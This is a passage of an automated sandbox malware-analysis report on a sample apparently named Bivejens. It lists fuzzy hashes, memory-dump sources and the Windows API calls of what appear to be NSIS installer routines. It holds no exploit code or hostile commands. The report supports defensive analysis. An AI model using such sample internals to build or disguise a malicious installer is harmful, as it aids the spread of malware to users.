                                                                                                                          • Opcode Fuzzy Hash: 488fd0351d7447f8304fff6212e8e395623b54420df12073c4c968ad452236a7
                                                                                                                          • Instruction Fuzzy Hash: A3C1A174E01218CFDB14DFA5C994B9DBBB2BF89300F5081AAD809AB355DB359E85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4a2df861aaf864efd9b464260317a2c8c5b53fb54d1615eff90ed522739156f4
                                                                                                                          • Instruction ID: 3fa30321a8e6b8bb83a9cb559b8976f66162963acf20d50e8b3e572c39416c4f
                                                                                                                          • Opcode Fuzzy Hash: 4a2df861aaf864efd9b464260317a2c8c5b53fb54d1615eff90ed522739156f4
                                                                                                                          • Instruction Fuzzy Hash: 4EC19F74E01218CFDB14DFA5C994B9DBBB2BF89300F6081AAD809AB355DB359E85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: feb53f265c1a336677c6fddf857045523882be5596c98ba61a362a85df845a34
                                                                                                                          • Instruction ID: 1163ccb3cee9f57f9dc932bedd5dce13f28fe5824428b8e061e532e17d62fce5
                                                                                                                          • Opcode Fuzzy Hash: feb53f265c1a336677c6fddf857045523882be5596c98ba61a362a85df845a34
                                                                                                                          • Instruction Fuzzy Hash: 92C1A174E01218CFDB14DFA5C994B9DBBB2BF89300F5081AAD809AB355DB359E85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 294f13d69e2e5be87ac4c9768a4a095631547554a1d892f9e5705f49d0dd0591
                                                                                                                          • Instruction ID: 2dc0b8e4f1a24bfad8a342944a5792766690749b7d40b19115b7af96e34ad694
                                                                                                                          • Opcode Fuzzy Hash: 294f13d69e2e5be87ac4c9768a4a095631547554a1d892f9e5705f49d0dd0591
                                                                                                                          • Instruction Fuzzy Hash: 10C1A074E01218CFDB54DFA5C994B9DBBB2BF89300F5080AAD809AB355DB359E85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9d2684c6b4724cdab303295a2197abe7089927785b1fda0f8a9151f5c9e66ab7
                                                                                                                          • Instruction ID: 955c8dc3f14ba29c81e7b1b73bf09d5deca97e5e8bb6d6372a74f2f5ee63a4e7
                                                                                                                          • Opcode Fuzzy Hash: 9d2684c6b4724cdab303295a2197abe7089927785b1fda0f8a9151f5c9e66ab7
                                                                                                                          • Instruction Fuzzy Hash: 6DC19F74E01218CFDB14DFA5C994B9DBBB2BF89300F6081AAD809AB355DB359E85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617614147.0000000021910000.00000040.00000800.00020000.00000000.sdmp, Offset: 21910000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21910000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 418168d3565ce1c9406aaa9f9703f5e8ee096f5d9e2207d5e19e993eb97b602e
                                                                                                                          • Instruction ID: 3bbf7e660602f6738407139b0de64405153dac99e0219dd7122d3a92b5dbab9f
                                                                                                                          • Opcode Fuzzy Hash: 418168d3565ce1c9406aaa9f9703f5e8ee096f5d9e2207d5e19e993eb97b602e
                                                                                                                          • Instruction Fuzzy Hash: 16C1B074E00218CFDB14DFA5C994B9DBBB2BF89310F6081AAD809AB355DB359E85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617941470.0000000021B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 21B30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 850fceb92e5f463139af1f09f22f17024e17518750f64d998ca97e239f3d89eb
                                                                                                                          • Instruction ID: f6ae9159036599a835f365b580197980d8bda28277e53266ca4b73653983c6c4
                                                                                                                          • Opcode Fuzzy Hash: 850fceb92e5f463139af1f09f22f17024e17518750f64d998ca97e239f3d89eb
                                                                                                                          • Instruction Fuzzy Hash: FDB16174E10218CFDB54DFA9D884A9DBBB2FF89310F2081A9D819AB365DB31AD41CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 81cdf2a13023abaae522797fc33e4764df6cfa3942dbaad046e2f69719c31de7
                                                                                                                          • Instruction ID: 858abc42586546c4d7170fecdd1853f5221bfb73bb4c6fd4e7fa405f1f646f91
                                                                                                                          • Opcode Fuzzy Hash: 81cdf2a13023abaae522797fc33e4764df6cfa3942dbaad046e2f69719c31de7
                                                                                                                          • Instruction Fuzzy Hash: D6A19074A01228CFDB64DF64C894B9ABBB2BF8A300F5085E9D84DA7351DB359E81CF51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617941470.0000000021B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 21B30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 00ff913700d5a5e2832f236511e0f42aed58c17c120416c15431ab7666b5c39f
                                                                                                                          • Instruction ID: 7e079b56c37c504c8932154ad2f67ed693fcd03a55ddfd2bb42fa781cb6d589a
                                                                                                                          • Opcode Fuzzy Hash: 00ff913700d5a5e2832f236511e0f42aed58c17c120416c15431ab7666b5c39f
                                                                                                                          • Instruction Fuzzy Hash: F051A574E00648CFDB48DFAAD484A9DBBF2BF8D310F248169D819AB365DB319942CF10
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 849306d093288899f044d879c53d7389d84e57d47be9794f84bcc7ffabef2e3d
                                                                                                                          • Instruction ID: ab6076622b0be738db6a01f7451fe56d61277c5983176225d5c6a09449ae0ca1
                                                                                                                          • Opcode Fuzzy Hash: 849306d093288899f044d879c53d7389d84e57d47be9794f84bcc7ffabef2e3d
                                                                                                                          • Instruction Fuzzy Hash: E8516E74A01228CFDB65DF24C894B9ABBB2BB4A301F5095E9D80EA7350DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4033686569-0
                                                                                                                          • Opcode ID: ae5c0a5b1e227b863e4676917699584e0ffc96e718b7c48018a006ff89a48536
                                                                                                                          • Instruction ID: 0ef2e9fcbf8ba9e8a741b32dbec3ccc9dbe9a4eacd635e405ca03246bc1772eb
                                                                                                                          • Opcode Fuzzy Hash: ae5c0a5b1e227b863e4676917699584e0ffc96e718b7c48018a006ff89a48536
                                                                                                                          • Instruction Fuzzy Hash: B2C01273B04100DBCB10EBEDAA4588E73A4DB443393304677E111F11E5D579D9515A39
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                                                                          • GetClientRect.USER32(?,?), ref: 004054D5
                                                                                                                          • GetSystemMetrics.USER32(?), ref: 004054DC
                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                                                                          • ShowWindow.USER32(00000000,?,?,000000FF), ref: 00405564
                                                                                                                          • ShowWindow.USER32(?,?), ref: 00405578
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                                                                            • Part of subcall function 00404230: SendMessageW.USER32(?,?,?,0040405B), ref: 0040423E
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405600
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405624
                                                                                                                          • ShowWindow.USER32(?,?), ref: 00405629
                                                                                                                          • ShowWindow.USER32(?), ref: 00405673
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                                                                          • CreatePopupMenu.USER32 ref: 004056B8
                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                                                                          • EmptyClipboard.USER32 ref: 00405753
                                                                                                                          • GlobalAlloc.KERNEL32(?,00000000), ref: 0040575F
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                                                                          • SetClipboardData.USER32(?,00000000), ref: 004057A8
                                                                                                                          • CloseClipboard.USER32 ref: 004057AE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID: {$6B
                                                                                                                          • API String ID: 590372296-3705917127
                                                                                                                          • Opcode ID: 07dce959fb3b4bd7827401e85aa695c337e7b33fdf51fd828ae6b4d9bc2b0272
                                                                                                                          • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                                                                          • Opcode Fuzzy Hash: 07dce959fb3b4bd7827401e85aa695c337e7b33fdf51fd828ae6b4d9bc2b0272
                                                                                                                          • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68
                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?), ref: 00403D5E
                                                                                                                          • ShowWindow.USER32(?), ref: 00403D7B
                                                                                                                          • DestroyWindow.USER32 ref: 00403D8F
                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                                                                          • SendMessageW.USER32(00000000,?,00000000,00000000), ref: 00403DE0
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403E95
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403E9F
                                                                                                                          • SetClassLongW.USER32(?,?,?), ref: 00403EB9
                                                                                                                          • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F0A
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403FB0
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403FE3
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404014
                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00404033
                                                                                                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00404046
                                                                                                                          • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                                                                          • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                                                                          • ShowWindow.USER32(?,?), ref: 004041B8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                          • String ID: 6B
                                                                                                                          • API String ID: 184305955-4127139157
                                                                                                                          • Opcode ID: f6ed39352ab810f3bf29cb5980913c4ff4fbf893e6a2b56c3deeb3d9b08c0738
                                                                                                                          • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                                                                          • Opcode Fuzzy Hash: f6ed39352ab810f3bf29cb5980913c4ff4fbf893e6a2b56c3deeb3d9b08c0738
                                                                                                                          • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,?,?,004033CB,?), ref: 00406670
                                                                                                                            • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                          • lstrcatW.KERNEL32(00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,?,00437800,774D3420,00435000,00000000), ref: 004039F5
                                                                                                                          • lstrlenW.KERNEL32(004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,?,00437800), ref: 00403A75
                                                                                                                          • lstrcmpiW.KERNEL32(00428198,.exe,004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                                                                          • GetFileAttributesW.KERNEL32(004281A0), ref: 00403A93
                                                                                                                          • LoadImageW.USER32(?,?,00000000,00000000,00008040,00435800), ref: 00403ADC
                                                                                                                            • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                                          • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403B31
                                                                                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00403B9C
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                                                                          • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                                                                          • API String ID: 1975747703-949986762
                                                                                                                          • Opcode ID: 1025ef68fa71260cdfb27955bbf6984406ebeef229d88fb4c4602e04cc0b9dff
                                                                                                                          • Instruction ID: 9910424c6ca31f4cc559053cc35dfc0eeb30f3212361bd75bc0ff30566f1833d
                                                                                                                          • Opcode Fuzzy Hash: 1025ef68fa71260cdfb27955bbf6984406ebeef229d88fb4c4602e04cc0b9dff
                                                                                                                          • Instruction Fuzzy Hash: C961B870244600BFE630AF269D46F273A6CEB44B49F40057EF985B62E2DB7D5911CA2D
                                                                                                                          APIs
                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F
                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                          • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                                          • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                                                                          • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                                          • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                                                                            • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                                            • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                                          • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                                                                          • wsprintfA.USER32 ref: 00405F4F
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,?,00427588,?,?,?,?,?), ref: 00405F8A
                                                                                                                          • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405F99
                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                                                                          • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                                                                            • Part of subcall function 00405D7A: GetFileAttributesW.KERNEL32(00438800,00402F1D,00438800,80000000,?,?,?,?,?), ref: 00405D7E
                                                                                                                            • Part of subcall function 00405D7A: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,?,?), ref: 00405DA0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                          • Opcode ID: 6c09ebac5ca80c8a4b241fb83fb30afa3bc9886cecd9621b20837952e45bb45a
                                                                                                                          • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                                                                          • Opcode Fuzzy Hash: 6c09ebac5ca80c8a4b241fb83fb30afa3bc9886cecd9621b20837952e45bb45a
                                                                                                                          • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,?,?,?), ref: 00402F0A
                                                                                                                            • Part of subcall function 00405D7A: GetFileAttributesW.KERNEL32(00438800,00402F1D,00438800,80000000,?,?,?,?,?), ref: 00405D7E
                                                                                                                            • Part of subcall function 00405D7A: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,?,?), ref: 00405DA0
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,?,?,?,?,?), ref: 00402F56
                                                                                                                          Strings
                                                                                                                          • Error launching installer, xrefs: 00402F2D
                                                                                                                          • soft, xrefs: 00402FCB
                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                          • Inst, xrefs: 00402FC2
                                                                                                                          • Null, xrefs: 00402FD4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                          • API String ID: 4283519449-527102705
                                                                                                                          • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                                          • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                                                                          • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                                          • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
